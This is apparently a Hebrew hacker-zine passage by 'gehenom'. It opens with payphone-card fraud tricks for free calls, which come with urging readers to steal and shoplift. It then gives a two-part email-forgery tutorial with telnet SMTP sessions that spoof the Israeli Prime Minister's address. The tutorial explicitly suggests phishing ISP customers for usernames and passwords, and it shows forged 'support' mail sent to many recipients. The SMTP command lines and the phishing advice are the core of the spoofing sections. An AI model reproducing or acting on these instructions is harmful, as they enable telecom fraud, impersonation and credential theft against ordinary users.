‫זה שהטלכרט נהרס‪ ...‬לכן תדאגו שיהיה לכם כמות מכובדת‪ .‬אוקי‪ ,‬עכשיו פתחו קלטת וידיאו ריקה‪.‬‬
‫חשוב מאוד שהקלטת תהיה ריקה‪ ,‬בלי שום דבר מוקלט עליה‪ .‬ושיהיה חדש‪ .‬מחיקת הקלטה ישנה לא‬
‫תעזור לנו‪.‬‬
‫כעת קחו מספריים וגזרו בעדינות חלק מן הסליל שבפנים‪ .‬זהרו על הסליל השחור שלא יתלכלך‪.‬‬
‫הדביקו‬
‫את הסליל על החלק האחורי העליון של הטלכרט‪ ,‬איפה שיש הרבה בליטות קטנות‪ .‬לאחר מכן‪ ,‬עברו‬
‫עם עיפרון‬
‫על הסליל‪ ,‬כך שיישאר שכבה דקה של פחם‪ .‬באסה שאת העפרונות עם הפחם הישנים החליפו כיום‬
‫עם חומר אחר‪.‬‬
‫לכן תיאלצו ללכת לחנות גרפיקה או לבית הישן של סבתא שלכם כדי למצוא עיפרון פחם‪ .‬אחרי‬
‫שגמרתם להדביק‬
‫את הסליל השחור המגנטי מהקלטת על הטלכרט‪ ,‬והשארתם עליו שיכבה דקה של פחם מן העיפרון‪,‬‬
‫הכניסו אותו‬
‫לתוך טלפון ציבורי‪ .‬מה שייקרה פה זה פעולה מגנטית הפוכה אשר הגלאי המגנטי לא יוכל לעמוד בו‪,‬‬
‫ולכן יהיה לכם זמן חופשי ללא הגבלה על הטלפון‪ .‬אז דברו חופשי‪ ,‬כי זה בזק‪.‬‬
‫‪gehenom‬‬

‫שימוש חוזר בכרטיסי טלכרט ‪ -‬שיטה מס‪2 .‬‬
‫שיטה שנייה למחזור טלכרטים‪...‬‬
‫דבר ראשון‪ ,‬עליכם למצוא כמה טלכרטים מ ש ו מ ש י ם‪ .‬כן‪ ,‬משומשים‪.‬‬
‫בשביל זה לכו לאוסף טלכרטים של אח שלכם הקטן ותגנבו לו חאפלה של איזה ‪.20‬‬
‫עדיף טלכרטים ישנים‪ ,‬למה הרבה מהחדשים מוגנים מפני הטריק שאני אראה לכם פה‪.‬‬
‫כמו כן עדיף שיהיה לכם איזה ‪ 20‬כי בניסיונות הראשונים זה בד"כ לא יוצא משהו ומה שקורה‬
‫זה שהטלכרט נהרס‪ ...‬לכן תדאגו שיהיה לכם כמות מכובדת‪ .‬אוקי‪ ,‬עכשיו תכייסו מהמכולת טיפקס‪.‬‬
‫התבוננו בחלק האחורי של אחד הטלכרטים‪ .‬רואים נקודות קטנות בולטות למעלה?‬
‫כסו אותם בשכבה שווה דקה של טיפקס‪ .‬עשו זאת בעדינות‪ .‬כל פעם שהטלכרט ייגמר‪,‬‬
‫תיאלצו לעשות זאת מחדש‪ ,‬אבל לא נורא‪ .‬תיהנו!!!!!!!!!!!‬
‫ודברו חופשי‪ ,‬כי זה בזק‪.‬‬
‫‪gehenom‬‬

‫זיוף ‪ - email‬חלק ‪1‬‬
‫בכתבה הזאת‪ ,‬הכתבה הכי טובה עד עכשיו אם תשאלו אותי‪,‬‬
‫אני אראה לכם איך לזייף אי מייל‪ .‬מה זאת אומרת? הכוונה היא שתוכלו לדוגמא‬
‫לשלוח לחבר שלכם אי מייל והחבר שלכם יחשוב שהוא קיבל את האי מייל הזה מדורון שפר‪.‬‬
‫כמובן שמצחוקים אפשר לעבור לצחוקים יותר טובים‪ ,‬כמו לשלוח למורה אי מייל מהמנהל‪,‬‬
‫או שאפשר גם לעבור לדברים רציניים יותר‪ ,‬כמו למשל לשלוח ללקוח של ספק אינטרנט כגון‬
‫נטויז'ין לדוגמא‪ ,‬אי מייל מהצוות תמיכה של נטויז'ין ולבקש ממנו את השם משתמש והסיסמא‪.‬‬
‫כמובן שזה ייראה לו חשוד‪ ,‬ולכן מה שאנחנו‪ ,‬ההאקרים‪ ,‬עושים במקרים כאלה‪,‬‬
‫זה משתמשים בקצת פסיכולוגיה‪ .‬אבל לפני שאני אתן לכך דוגמאות כדאי שנעבור כבר‬
‫לזיוף האי מייל הראשון שלכם!!!‬
‫החלטתי שלפני שאני אסביר משהו‪ ,‬הפעם נתחיל מייד עם האקשן (‪)yeah, right...‬‬
‫רק אח"כ אני אסביר מה עשינו‪ ,‬ונתחיל לשחק עם זה‪)play with it???( ...‬‬
‫רק דבר אחד לפני שאנחנו מתחילים‪ ,‬את האקשן הראשוני נעשה עם ‪.hotmail‬‬
‫למה עם ‪ ?hotmail‬מכמה סיבות‪:‬‬
‫* מליוני אנשים רשומים אליהם‪.‬‬
‫אתם תוכלו לזייף אי מייל עם ביטחון וניסיון להמוני אנשים‪.‬‬
‫* מסיבות כאלה ואחרות אני רוצה שגם אתם תשנאו את מיקרסופוט ותצטרפו למועדון השונאים‬
‫והשונאות‪.‬‬
‫אם אני אראה לכם כמה קל זה לשלוח אי מיילים מזויפים ללקוחות שלהם‪ ,‬סביר להניח שלא תאהבו‬
‫אותם על כך‪.‬‬
‫בעיקר בגלל שסביר להניח שכרגע אתם לקוחות שלהם‪.‬‬
‫* ככה סוף סוף תעזבו אותם‪ .‬תזרקו אותם‪ .‬ותשיגו כתובת אי מייל נורמלית‪.‬‬
‫לא עוד ‪ you@hotmail.com‬מגעיל‪ ....‬אלא מעכשיו ‪ you@any-thing-else-ya-want.com‬יפהפה‪.‬‬
‫בכדי שנוכל להתחיל‪ ,‬אם אתם עוד לא רשומים‬
‫ל ‪ hotmail.com‬אז לכו ל ‪ http://www.hotmail.com‬ותירשמו‪.‬‬
‫‪................................................‬‬
‫הערה‪:‬‬
‫‪ hotmail.co.il‬ו ‪ hotmail.com‬זה לא אותו דבר‪.‬‬
‫גם המנויים של ‪ hotmail.co.il‬צריכים ללכת לאתר‬
‫של ‪ hotmail.com‬ולהירשם‪ .‬אם לא תעשו את זה‪,‬‬
‫אז כלום פה לא יעבוד‪...‬‬
‫רק מי שרשום ל ‪ hotmail.com‬לא חייב להירשם שנית‬
‫אלא ישתמש בכתובת שקיבל מ ‪hotmail.com‬‬
‫תודה‬
‫‪................................................‬‬
‫טוב‪ ,‬נתחיל‪ .‬נגיד לדוגמא שהאי מייל שלכם ב ‪ hotmail.com‬הוא ‪hacker@hotmail.com‬‬
‫אנחנו עכשיו נשלח לכם אי מייל מראש הממשלה‪ .‬כתובת האי מייל של ראש הממשלה היא‪:‬‬
‫‪rohm@pmo.gov.il‬‬
‫(דרך אגב‪ ,‬זאת באמת כתובת האי מייל של הראש הממשלה‪ .‬נשבע לכם‪ .‬אל תאמינו‪ ..‬לא צריך‪).‬‬

‫אוקי‪ ,‬תעשו את הצעדים הבאים‪:‬‬
‫* לחצו על תפריט ההתחל‬
‫* בחרו בהפעלה‪...‬‬
‫* עכשיו הקלידו‪telnet mail.hotmail.com 25 :‬‬
‫ולחיצו על כפתור ה ‪.enter‬‬
‫חלון חדש ייפתח‪ .‬זה חלון טלנט‪ .‬מה שאנחנו בעצם עושים פה זה מטלנטים (מתחברים‪ )..‬לשרת דואר‬
‫של‬
‫‪ hotmail‬לפורט ‪ .25‬מבולבלים?‬
‫תסגרו את חלון הטלנט ואני אסביר לכם‪....‬‬
‫האינטרנט הוא בעצם רשת ענקית של רשתות מחשבים מחוברות אחת לשנייה‪.‬‬
‫ביחד זה בלגן אחד גדול של תעבורת אינפורמציה בין מיליוני מחשבים‪ .‬מחשבים ביתיים‪ ,‬שרתים‪,‬‬
‫תחנות עבודה‪ ,main frames ,‬מפלצות‪ ,‬חתולים‪ ,‬מה שאתם לא רוצים‪.‬‬
‫עכשיו‪ ,‬לא לכל המחשבים האלה יש ‪ .windows‬בעצם‪ ,‬לרובם אין‪ .‬לרוב השרתים לפחות‪...‬‬
‫בכל מקרה‪ ,‬מכיוון שלא לכל המחשבים יש מערכת הפעלה אחת סטנדרטית‪ ,‬צריך כלי תקשור‬
‫סטנדרטי‪.‬‬
‫צריך חוקים מסוימים‪ ,‬שכל מחשב ילך לפיהם כדי לתקשר עם מחשבים אחרים‪ .‬צריך שפה משותפת‬
‫בין המחשבים‪.‬‬
‫צריך‪ ....‬פרוטוקולים‪ ....‬יפה‪ .‬עכשיו לא נתחיל לדבר פה על כל הפרוטוקולי אינטרנט כי יש הרבה‪,‬‬
‫אבל תבינו שהדפדפן אינטרנט המחורבן שלכם זה לא אינטרנט‪ .‬זה דפדפן‪ .‬הוא מתחבר לשרת ‪.http‬‬
‫ולפי חוקי פרוטוקול ה ‪ http‬הוא מתקשר עם השרת‪ ,‬מקבל את המידע על האתר‪( ,‬בשפת ‪)html‬‬
‫ומתרגם את זה‬
‫למה שאתם רואים בדפדפן‪.‬‬
‫דרך אגב‪,‬‬
‫‪http = hyper text transfer protocol‬‬
‫כלומר פרוטוקול של העברת היפר טקסט‪ .‬או במילים אחרות טקסט שאתם לוחצים עליו וכך עוברים‬
‫לטקסט אחר‪.‬‬
‫מה שנקרא בשפה המודרנית ‪ -‬לגלוש‪ .‬ובשפה הדו מודריונרית ‪ -‬סתאאאאאם‪ .‬לא חשוב‪.‬‬
‫עכשיו‪ ,‬אי מייל לעומת זאת משתמש בשני פרוטוקולים‪ smtp :‬ו ‪.pop3‬‬
‫אנחנו עכשיו נשתמש רק ב ‪ .smtp‬למי שמעוניין‪,‬‬
‫‪smtp = simple mail transfer protocol‬‬
‫ובקציצוצוציצור עכשיו‪ ,‬מה שנעשה זה‪ ,‬בדיוק כמו שהדפדפן אינטרנט שלכם מתחבר לשרת ‪http‬‬
‫לפורט ‪,80‬‬
‫אנחנו נתחבר לשרת ‪ smtp‬לפורט ‪ .25‬למה? ככה‪ .‬אני לא אסביר את זה בכתבה הזאת כי אין מקום‪...‬‬
‫ואז‪ ,‬כמו שלדוגמא ניקח את ה ‪ ms outlook‬שלכם‪ ,‬כמו שהאאוטלוק (או כל תוכנת דואר אחרת)‬
‫מתקשרת עם‬
‫שרת הדואר (‪ ,)smtp‬ככה הפעם אנחנו נעשה י ד נ י ת‪ .‬נעשה חיבור חי‪ .‬ונדבר עם השרת‪ .‬דמיינו‬
‫שעכשיו‬
‫אתם תוכנת אאוטלוק‪ .‬או כל תוכנת דואר אחרת שאתם רוצים‪ .‬עכשיו דמיינו שאתם אפרוח‪.‬‬
‫עכשיו דמיינו שאתם במדינה שבה סמים הם דבר חוקי‪ .‬דמיינו שאתם‪..‬‬
‫‪ ###‬עכשיו תתעוררו ותחזור למציאות המרושעת‪### .‬‬

‫נמשיך‪.‬‬
‫לוחצים על התחל‪ ,‬הפעלה‪ ,‬ומקלידים ‪.telnet‬‬
‫זה ייפתח את תוכנת הטלנט‪ ,‬שנותנת לנו להתחבר לאיזה שרת שאנחנו רוצים לאיזה פורט שאנחנו‬
‫רוצים‪.‬‬
‫מה זה פורט (יציאה)? ובכן‪ ,‬הכוונה הטכנית היא למשהו שפתוח במחשב ומוכן לחיבור‪ .‬כלומר מחכה‬
‫לחיבור‬
‫ממחשב אחר (או מכל דבר אחר בעצם)‪ .‬אבל בדרך כלל כשמדברים על פורט מתכוונים למספר של‬
‫הפורט‪.‬‬
‫לדוגמא פורט ‪.80‬‬
‫פורט ‪ 80‬למי שלא יודע זה השרת אינטרנט‪.http ,‬‬
‫כמובן שזה לא תמיד חייב להיות דווקא ככה‪ ,‬בעיקרון כשפותחים שרת אפשר לקבוע דרך איזה‬
‫פורט יהיה אפשר לגשת אליו‪ .‬אבל בד"כ פורט ‪ 80‬זה אתר אינטרנט‪ .‬פורט ‪ 110‬זה דואר נכנס‪.‬‬
‫פורט ‪ 25‬זה דואר יוצא‪ ,‬ולכן אנחנו נתחבר לפורט ‪ .25‬אבל שוב‪ ,‬זה לאו דווקא תמיד ככה‪.‬‬
‫למי שרוצה לדעת למה דווקא פורט ‪ 80‬זה לשרת אינטרנט ולמה דווקא פורט ‪ 25‬לדואר יוצא‪,‬‬
‫אז ככה‪ :‬לכל פרוטוקול אינטרנט יש ‪ ,rfc‬שמגדיר אותו‪ .‬זה לא אומר שכל ‪ rfc‬מגדיר פרוטוקול‬
‫אינטרנט‪.‬‬
‫יש גם ‪ rfc‬על אבטחה‪ ,‬או על תוכנה חדישה בפיתוח‪ ,‬או סתאם הערות על פיתוח טכנולוגיית אינטרנט‬
‫כזו או אחרת‪ .‬יש ‪ rfc‬מצחיק‪ ,‬יש ‪ rfc‬דפוק‪ ,‬יש כל מיני‪.‬‬
‫‪rfc = request for comments‬‬
‫עכשיו‪ ,‬שם קובעים את הסטנדרטים לכל פרוטוקול‪ .‬ככה כל חברה או תכנתן יחיד יכול לתכנת את‬
‫תוכנת השרת‬
‫או את תוכנת הלקוח שלו לפי אותם החוקים שכל חברה‪/‬תכנתן אחר בעולם ייעשה ולא משנה לאיזה‬
‫מערכת הפעלה‬
‫זה מתוכנת זה יוכל לתקשר עם השרת‪/‬לקוח של האחר‪.‬‬
‫(שרת‪/‬לקוח‪ :‬תוכנת לקוח = אינטרנט אקספלורר לדוגמא | תוכנת שרת = ‪ httpd‬לדוגמא ] למי שמכיר‬
‫])‬
‫לכן אאוטלוק יכול להתחבר לשרתי דואר על מקינטוש‪ ,‬יוניקס‪ ,‬ווינדוס‪ ,‬נובל וכל מערכת אחרת‬
‫בעצם‪.‬‬
‫לכן שרת הדואר של מיקרוסופט יכול לקבל אימייל מכל תוכנת דואר שבעולם‪.‬‬
‫עכשיו נחזור לזיוף האימייל שלנו‪ .‬הרי הבטחתי לכם מייד אקשן‪.‬‬
‫טוב‪ ,‬תחזרו לחלון הטלנט‪ ,‬ומי שאצלו זה עדיין לא פתוח שייפתח‪ .‬שוב‪ ,‬כדי להיכנס לתוכנת הטלנט‬
‫תלחצו על התחל‪ ,‬הפעלה‪ ,‬והקלידו ‪.telnet‬‬
‫עכשיו‪ ,‬לחצו על תפריט ‪terminal‬‬
‫בחרו ב ‪preferences...‬‬
‫ובדקו ש'‪ 'local echo‬מסומן‪ .‬אם הוא לא מסומן‪ ,‬סמנו אותו עכשיו‪ ,‬ואז לחצו על ‪.ok‬‬
‫מה שה ‪ local echo‬עושה זה שהטקסט שתקלידו לשרת יוצג על המסך שלכם‪ .‬זה חשוב מאוד‪.‬‬
‫עכשיו לחצו על תפריט ‪ connect‬ובחרו ב ‪remote system...‬‬
‫כאן ייפתח לכם תיבה שמבקשת פרטים על השרת שברצונכם להתחבר אליו‪.‬‬
‫‪ :host name‬הקלידו כאן את כתובת השרת‪ .‬במקרה שלנו ‪mail.hotmail.com‬‬
‫‪ :port‬כאן מקלידים את הפורט‪ .‬אפשר גם לבחור מהרשימה‪ ,‬אבל היא מצומצמת‪ .‬הקלידו ‪25‬‬
‫‪ :termtype‬באיזה הדמיה לבחור‪ .‬אתם כרגע לא צריכים לדעת מה זה אומר‪ ,‬פשוט בחרו ‪vt100‬‬
‫כעת‪ ,‬לחצו על ‪.connect‬‬
‫כמו שאתם רואים זה מתחבר לשרת דואר‪.‬‬
‫השרת מציג לנו איזה גרסה הוא‪ ,‬לפעמים את החברה שתכנתה אותו‪ ,‬את השעה‪ ,‬תאריך‪ ,‬או לפעמים‬

‫כלום‪.‬‬
‫זה הכל תלוי בשרת‪ .‬במקרה שלנו זה מציג‪:‬‬
‫‪hotmail )no uce( esmtp server ready at mon feb 12 10:59:39 2000-220‬‬
‫‪esmtp spoken here 220‬‬
‫פחות או יותר‪...‬‬
‫עכשיו‪ ,‬אם השרת לא מקבל ממכם קלט לזמן מסוים (בד"כ כ ‪ 10-30‬שניות)‪ ,‬הוא מנתק את החיבור‪.‬‬
‫לכן כנראה תיאלצו להתחבר מחדש לפי ההוראות שנתתי מקודם‪ .‬טוב‪ ,‬אחרי שזה הציג לכם את הזבל‬
‫שלו‪,‬‬
‫הקלידו את השורות הבאות‪:‬‬
‫‪helo hacker‬‬
‫‪mail from: rohm@pmo.gov.il‬‬
‫‪rcpt to: hacker@hotmail.com‬‬
‫‪data‬‬
‫‪from: il goverment‬‬
‫‪subject: israel's goverment is proud of you‬‬
‫‪date: feb 12 2001‬‬
‫‪hi hacker‬‬
‫‪the israeli goverment is very proud of you‬‬
‫‪you now have the knowledge to forge email, which is real cool‬‬
‫‪and usefull too. please use it correctly and carefully‬‬
‫‪il govermnet‬‬
‫‪.‬‬
‫זהו‪ .‬רק במקום ‪ hacker@hotmail.com‬תכתבו את האימייל שלכם‪.‬‬
‫עוד הערה זה שלחיצה על ה ‪ backspace‬כדי למחוק תווים לא תעבוד‪ .‬כלומר‪ ,‬זה ייראה כאילו זה‬
‫מוחק אותם‪,‬‬
‫אבל מה שזה בעצם עושה זה מוסיף את זה כמו אות‪ .‬אני לא אסביר עכשיו למה אני מתכוון‪ ,‬רק‬
‫תיזהרו‬
‫לא לטעות בהקלדה‪ ,‬כי לא תוכלו להיעזר ב ‪ .backspace‬אם אתם טועים‪ ,‬פשוט לחצו על מקש ה‬
‫‪ enter‬ואז‬
‫הקלידו שוב את מה שרציתם להקליד אבל טעיתם‪ .‬עכשיו כנסו ל ‪ www.hotmail.com‬ותבדקו את‬
‫האימייל שלכם‪.‬‬
‫יהיה שם מכתב מראש הממשלה‪ .‬מגניב או לא מגניב???? (!!!!!!!!!!!!!!!!!‪)magniv‬‬
‫קראו את המכתב‪ ,‬ואז לחצו על ‪ reply‬כדי לשלוח לו מכתב בחזרה‪ .‬כמו שתראו‪,‬‬
‫זה יישלח את המכתב חזרה לאימייל האמיתי שלו‪ .‬כלומר למי שאתם שולחים אימייל מזויף‪ ,‬אין‬
‫סיכוי לדעת‬
‫שזה מזויף‪ .‬אלא אם כן הוא קרא את הכתבה הזאת‪ .‬בהמשך‪ ,‬בחלק ‪ 3‬של המדריך הזה‪,‬‬
‫אני אסביר לכם איך לבדוק אם האימייל שקיבלתם מזויף‪.‬‬
‫אבל לפני שאתם קופצים לחלק ‪ ,3‬יש לכם את חלק ‪,2‬‬
‫שמסביר טכנית איך הכל עובד ונותן לכם לשחק עם זה כמה שאתם רוצים‪ .‬עד לפעם הבאה‪,‬‬
‫‪gehenom‬‬

‫זיוף ‪ - email‬חלק ‪2‬‬
‫"יונתן הקטן הלך בבוקר אל הגן‪.‬‬
‫הוא טיפס על העץ אפרוחים חיפש‪.‬‬
‫אוי ואבוי לו לשובב‪ .‬חור גדול‬
‫במכנסיו‪ .‬מן העץ התגלגל‪,‬‬
‫ועונשו קיבל‪"...‬‬

‫ברוווווווווווווכים הבאים לחלק השני של המדריך 'זיוף אי מייל'!!!‬
‫בחלק זה‪ ,‬אני אסביר לכם למה ככה זה ככה ואיך עושים את זה ואת זה‪.‬‬
‫אחרי שתגמרו עם החלק הזה‪ ,‬לא רק שתהיו מוכנים לעבור לחלק השלישי והאחרון‪,‬‬
‫אלא גם תוכלו לזייף אימייל לכל שרת דואר שקיים‪ ,‬תוכלו לעשות זאת בעברית‪ ,‬ולהשתמש בזה נכון‪,‬‬
‫ולהבין איך הכל עובד ולמה‪ .‬תוכלו לשלוח לכמה אנשים באותו הזמן‪ .‬והכי חשוב ‪ -‬מוטי יחזור כבר‬
‫הביתה‪.‬‬
‫מי זה מוטי? וואלה לא יודע‪ ....‬טוב‪ ,‬נתחיל‪.‬‬
‫}}}‬
‫רוב החומר שתקראו פה נלקח מ '‪ 'rfc 821‬שמגדיר את פרוטוקול ה ‪.smtp‬‬
‫החומר תורגם לעברית בכדי שתוכלו להבין אותו‪ .‬למרות זאת‪ ,‬אני לא מבטיח‬
‫לכם שום דבר‪ ,‬והתרגום פה נעשה בדרך האישית שלי‪ ,‬והוא בהחלט לא תירגם‬
‫רשמי של ה ‪ .rfc‬אני מאוד ממליץ לכל אלה מכם שיודעים אנגלית לקרוא את ‪.rfc 821‬‬
‫{{{{‬
‫טוב‪ ,‬אז אם כי זה לא נמצא בכל שרת‪ ,‬רוב שרתי הדואר מבקשים שאתם‪,‬‬
‫אלה ששולחים את האימייל‪ ,‬תזדהו‪ .‬זאת כדי שיידעו מי אתם‪ .‬בד"כ כשאתם שולחים‪/‬מקבלים‬
‫אימייל‬
‫הוא עובר דרך יותר משרת אחד‪ .‬כאשר לכל שרת שהוא נשלח השרת שממנו הוא הגיע מזדהה‪ ,‬וכך מי‬
‫שמקבל את‬
‫האימייל יודע דרך איפה זה עבר‪ .‬זה יכול להיות מאוד יעיל במקרים מסוימים‪ .‬כמובן שזאת לא‬
‫הסיבה‬
‫העיקרית‪ ,‬זאת סתאם הייתה דוגמא שאתם כנראה תשתמשו בה בעתיד‪ .‬בכל מקרה‪ ,‬פקודת‬
‫ההזדהות היא‪:‬‬
‫‪helo‬‬
‫עכשיו‪ ,‬לא כל השרתים מתייחסים לפקודה באותה צורה‪ .‬יש הרבה שרתים שבכלל לא משתמשים‬
‫בפקודה הזאת‪,‬‬
‫ואם תשלחו להם את הפקודה הם לא יידהו אותה‪ .‬בשרתים אחרים לעומת זאת‪ ,‬הפקודה היא חובה‪,‬‬
‫ובלעדיה‪,‬‬
‫לא תוכלו לשלוח את האימייל‪ .‬אצל רוב השרתים‪ ,‬אתם לא חייבים להגיד ‪ ,helo‬למרות שכנראה‬
‫השרת יעיר‬
‫לכם על כך אבל הוא בכל זאת ייתן לכם לשלוח דרכו את האימייל‪ .‬ככה שתעשו מה שאתם רוצים‪ .‬אני‬
‫רק אבהיר‬
‫פה משהו חשוב‪ :‬הפקודה ‪ helo‬היא לא זאת שגורמת להזדהות‪ .‬כלומר‪ ,‬אם לא תכתבו ‪ helo‬זה לא‬

‫אומר שאתם‬
‫אנונימיים והשרת לא יודע מי אתם‪ .‬הפקודה רק מסמלת את ההזדהות והרבה פעמים ככה השרת גם‬
‫יודע דרך איזה‬
‫תוכנה שלחו את האימייל או מאיזה דומיין‪ .‬בכל מקרה‪ ,‬אני ממליץ שתשחקו עם זה בדיוק כמו עם כל‬
‫פקודה‬
‫שאני אתן פה‪ .‬אצל ‪ mail.hotmail.com‬לדוגמא‪ ,‬לא רק שתיאלצו לכתוב את הפקודה‪,‬‬
‫אלא גם תצטרכו להגיד מי אתם‪.‬‬
‫דוגמאות‪:‬‬
‫‪helo eduction.gov.il‬‬
‫‪helo walla.co.il‬‬
‫‪helo hacker‬‬
‫‪helo fuckyou‬‬
‫‪helo ido‬‬
‫טוב‪ .‬רק הערה אחרונה בקשר ל ‪ ,helo‬אם אתם תוהים למה זאת פקודת הזדהות אם בד"כ כותבים‬
‫רק ‪ helo‬בלי‬
‫להזדהות‪ ,‬אז ככה‪ ,‬ברגע שאתם כותבים‪:‬‬
‫‪helo‬‬
‫השרת מגיב ב ‪ lookup‬שבודק את כתובת המחשב שלכם‪ .‬אבל שוב‪ ,‬זה לא אומר שאם לא תכתבו‬
‫‪ helo‬שרת הדואר‬
‫לא יידע מי אתם‪....‬‬
‫טוב‪ ,‬אז אחרי ה ‪ helo‬באה הפקודה הבאה‪.mail :‬‬
‫הפקודה ‪ mail‬אומרת לשרת שיתחיל עכשיו שליחת אימייל חדש‪ ,‬ויימחק (כמעט) את כל המידע שהיה‬
‫לו עד עכשיו‬
‫על המכתב שעבר‪ ,‬כולל מי יקבל את המכתב‪ ,‬את תוכן המכתב עצמו‪ ,‬את השולח וכו'‪ .‬מקלידים את‬
‫הפקודה‬
‫בצורה הבאה‪:‬‬
‫‪mail from: sender‬‬
‫כאשר ה ‪ = sender‬כתובת דואר שממנה מי שמקבל את האימייל יקבל את האימייל‪.‬‬
‫לדוגמא‪:‬‬
‫‪mail from: yosi@hotmail.com‬‬
‫‪mail from: shaq@lakers.com‬‬
‫‪mail from: omri@netvision.net.il‬‬
‫את הפקודה ‪ mail‬השרת מקבל רק פעם אחת‪ .‬ברגע שהשרת קיבל את הפקודה‪ ,‬הוא יגיב עם הערה‬
‫חיובית‬
‫שבאה יחד עם המספר ‪ .250‬כמעט ואף פעם לא יקרה לכם שהשרת לא יחזיר תגובה של ‪ 250‬אחרי‬
‫פקודת ה ‪.mail‬‬
‫זאת מכיוון שהשרת במקרה זה‪ ,‬מקשיב למה שאומרים לו‪ .‬ואם תגידו לו שאתם‬
‫‪ yosi@sdf.sdf.bye.fuck‬הוא‬
‫יקבל זאת‪ .‬כמובן שזה לא נכון לכל שרתי הדואר‪ ,‬אבל אצל רובם זה כך‪ .‬באמת‪ .‬נסו את זה בעצמכם‪.‬‬
‫מקסימום הוא יגיד לכם שהדומיין ‪ sdf.sdf.bye.fuck‬לא קיים‪ .‬אבל זה ייקרה לעיתים מאוד‬
‫רחוקות‪..‬‬
‫במקרה וכתבתם‬
‫‪mail from: tosi@hotmail.com‬‬

‫במקום‬
‫‪mail from: yosi@hotmail.com‬‬
‫פשוט הקלידו מחדש את מה שרציתם‪,‬‬
‫ומכיוון שאחרי פקודת ה ‪ mail‬השרת מוחק את המידע שהיה לו על המכתב‪ ,‬הכתובת החדשה‬
‫והנכונה תתקבל‪ ,‬ולא זאת השגויה‪ .‬רק הערה קטנה‪ ,‬הפקודה ‪ mail‬לא נועדה בכדי למחוק את המידע‪,‬‬
‫בשביל זה יש פקודה נוספת‪ ...‬אבל תרגישו חופשיים להשתמש בזה בהתחלה כדי לתקן את ה ‪.mail‬‬
‫עכשיו‪ ,‬אחרי ה ‪ mail‬מגיע ה ‪ .rpct‬ה ‪ rcpt‬אומר לשרת מי יהיה זה שיקבל את האימייל‪.‬‬
‫אם השרת מוצא שהכתובת אכן קיימת‪ ,‬הוא מגיב עם הערה חיובית שבאה יחד עם המספר‪ .250 ...‬אם‬
‫הוא לא‬
‫מצליח למצוא את הכתובת‪ ,‬הוא מגיב בהערה שלילית יחד עם המספר ‪ .550‬למי שעוד לא שם לב‪,‬‬
‫המספר ‪ 250‬מסמל את התקבלות הפקודה‪ .‬יש עוד מספרים שמסמלים עוד דברים‪ .‬אבל נמשיך עם ה‬
‫‪.rcpt‬‬
‫את ה ‪ rcpt‬כותבים כך‪:‬‬
‫‪rcpt to: receiver‬‬
‫כאשר ה ‪ = receiver‬כתובת הדואר של הנמען‪ .‬כלומר הבנאדם שיקבל את האימייל‪.‬‬
‫לדוגמא‪:‬‬
‫‪rcpt to: daniel@inter.net.il‬‬
‫‪rcpt to: dana19@hotmail.com‬‬
‫‪rcpt to: webmaster@yahoo.com‬‬
‫‪rcpt to: moron@education.gov.il‬‬
‫עכשיו‪ ,‬את הפקודה ‪ rcpt‬אפשר לכתוב ללא הגבלה כמה פעמים שאתם רוצים‪.‬‬
‫וכל זה במכתב יחיד!! לדוגמא הייתם רוצים לשלוח אימייל מזויף‬
‫לכל הלקוחות של בזק בינלאומי בפעם אחת‪ ,‬אתם מתחברים לשרת דואר שלהם ומקלידים משהו‬
‫כזה‪:‬‬
‫‪helo‬‬
‫‪mail from: support@bezeqint.net‬‬
‫‪rcpt to: user1‬‬
‫‪rcpt to: user2‬‬
‫‪rcpt to: user3‬‬
‫‪rcpt to: user4‬‬
‫‪rcpt to: user5‬‬
‫‪rcpt to: user6‬‬
‫וכן הלאה‪ ...‬כמובן ש ‪ user1‬עד ‪ user6‬הם סתאם שמות שהמצאתי והם לאו דווקא אמיתיים‪...‬‬
‫אז כמו שאתם רואים אפשר להקליד את הפקודה ‪ rcpt‬אלפי פעמים בכל אימייל‪ .‬עם הפקודה ‪mail‬‬
‫לעומת זאת‪,‬‬
‫אי אפשר לעשות את זה‪ .‬אלא תיאלצו לכתוב את כל האימייל מחדש בשביל זה‪ .‬ועכשיו לפקודה‬
‫הבאה שלנו‪,‬‬
‫שהיא ה ‪ .data‬פקודת ה ‪ data‬מתחילה את המכתב עצמו‪ .‬כלומר בפקודה זו‪ ,‬אנו כותבים את המכתב‪.‬‬
‫אחרי שגמרנו‪ ,‬איך אומרים לשרת שגמרנו לכתוב את המכתב? פשוט מקלידים נקודה בשורה נפרדת‪.‬‬
‫לדוגמא‪:‬‬
‫‪data‬‬
‫‪hi danny, what's up? i heard you just got‬‬

‫‪the latest album of 2pac. what shall i say? it sucks‬‬
‫‪i've heard it like a thousand times‬‬
‫‪anyway, enjoy it‬‬
‫‪bye‬‬
‫‪.‬‬
‫ה ‪( .‬נקודה) בסוף מאוד חשובה‪ .‬זה גם הכרחי שהיא תהיה בשורה נפרדת‪.‬‬
‫את המכתב אפשר כמובן גם לכתוב בעברית‪ .‬עוד משהו חשוב‪ ,‬זה שהפקודה ‪ data‬כוללת גם את‬
‫הראשים‪.‬‬
‫כלומר את התוספות של המכתב‪ .‬כגון הנושא (או הכותרת אם אתם רוצים)‪ ,‬את התאריך‪ ,‬כתובת‪/‬שם‬
‫השולח‬
‫ולפעמים גם עוד כמה דברים‪ .‬את הראשים (תוספות) כותבים כך‪:‬‬
‫‪date: the date goes here‬‬
‫‪from: the sender‬‬
‫‪to: the receiver‬‬
‫‪subject: subject goes here‬‬
‫לדוגמא‪:‬‬
‫‪data‬‬
‫‪date: 23 oct 00 11:29:33‬‬
‫‪from: matrix@walla.co.il‬‬
‫‪to: yanir_br@yahoo.com‬‬
‫‪subject: happy birthday‬‬
‫‪hi yanir‬‬
‫‪i wish you a happy birthday‬‬
‫‪hope you'll enjoy being 15‬‬
‫‪i bought you this real awesome thing‬‬
‫‪you must see it‬‬
‫‪email me back as quick as ya can to matrix@walla.co.il‬‬
‫‪c ya, matrix‬‬
‫‪.‬‬
‫כמו שאתם רואים‪ ,‬יש שורה ריקה המבדילה בין הראשים (תוספות) למכתב עצמו‪ .‬השורה הזאת היא‬
‫הכרחית‪.‬‬
‫עכשיו‪ ,‬את המידע של הראשים (שולח‪ ,‬נושא וכו') אפשר לכתוב גם בעברית‪.‬‬
‫כמו כן אם ב ‪ mail‬ציינתם את כתובת השולח‪ ,‬מה שבטוח עשיתם‪ ,‬אז בתוספת ‪ from‬אפשר לכתוב‬
‫שם או כינוי במקום כתובת אימייל‪ .‬זה גם מאוד מומלץ לעשות את זה‪ .‬עוד משהו‪,‬‬
